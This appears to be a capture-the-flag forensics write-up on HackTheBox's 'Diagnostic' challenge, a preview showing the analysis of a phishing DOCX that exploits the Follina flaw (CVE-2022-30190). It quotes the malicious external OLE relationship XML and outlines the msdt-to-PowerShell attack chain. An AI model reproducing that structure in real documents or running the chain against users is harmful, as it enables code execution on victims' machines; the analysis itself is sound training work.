forensicsfreemedium

Diagnostic

hackthebox

Task: Analyze a malicious Office document from a phishing campaign to extract the hidden flag. Solution: Unzip the DOCX to find an external OLE object referencing an HTML file that exploits CVE-2022-30190 (Follina) via ms-msdt:/ protocol, decode the base64 PowerShell payload, and deobfuscate format string reordering to reveal the flag embedded in the malware filename.

$ ls tags/ techniques/

base64 docx phishing follina cve-2022-30190 msdt ole_object powershell_obfuscation

base64_decodingmsdt_protocol_handler_rceexternal_ole_referencepowershell_format_string_deobfuscation

$ cat /etc/rate-limit

Rate limit reached (20 reads/hour per IP). Showing preview only — full content returns at the next hour roll-over.

Diagnostic - HackTheBox

Description

Our SOC has identified numerous phishing emails coming in claiming to have a document about an upcoming round of layoffs in the company. The emails all contain a link to diagnostic.htb/layoffs.doc. The DNS for that domain has since stopped resolving, but the server is still hosting the malicious document. Take a look and figure out what's going on.

Analysis

This challenge involves analyzing a malicious Office document that exploits CVE-2022-30190 (Follina vulnerability). The attack chain:

Phishing email with link to malicious .doc file
Document contains external OLE object reference to HTML file
HTML file uses ms-msdt:/ protocol handler to execute PowerShell
PowerShell payload is base64 encoded and uses format string obfuscation
Flag is hidden in the filename of the downloaded malware

Solution

Step 1: Download the malicious document

Since DNS no longer resolves, use Host header to access the server directly:

curl -H "Host: diagnostic.htb" http://94.237.59.242:45434/layoffs.doc -o layoffs.doc

Step 2: Identify file type

file layoffs.doc
# Output: Zip archive data, at least v2.0 to extract

The .doc extension is misleading - this is actually a DOCX file (Office Open XML format, which is a ZIP archive).

Step 3: Extract and analyze document structure

unzip layoffs.doc -d extracted/

Directory structure:

extracted/
├── [Content_Types].xml
├── _rels/
├── docProps/
└── word/
    ├── document.xml
    ├── _rels/
    │   └── document.xml.rels
    └── ...

Step 4: Find external OLE object reference

In word/document.xml, found an OLEObject with suspicious attributes:

Type="Link" - External reference
ProgID="htmlfile" - Will be handled by HTML handler
References rId996

In word/_rels/document.xml.rels:

<Relationship Id="rId996" 
  Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" 
  Target="http://diagnostic.htb/223_index_style_fancy.html!" 
  TargetMode="External"/>

Key indicator: External OLE object pointing to HTML file - classic Follina setup.

...

$ grep --similar

Similar writeups

[forensics][free]oBfsC4t10n2— hackthebox
[forensics][free]emo— hackthebox
[forensics][Pro]oBfsC4t10n— HackTheBox
[forensics][free]Obscure— hackthebox
[forensics][free]Dream Job-2 Sherlock Scenario— hackthebox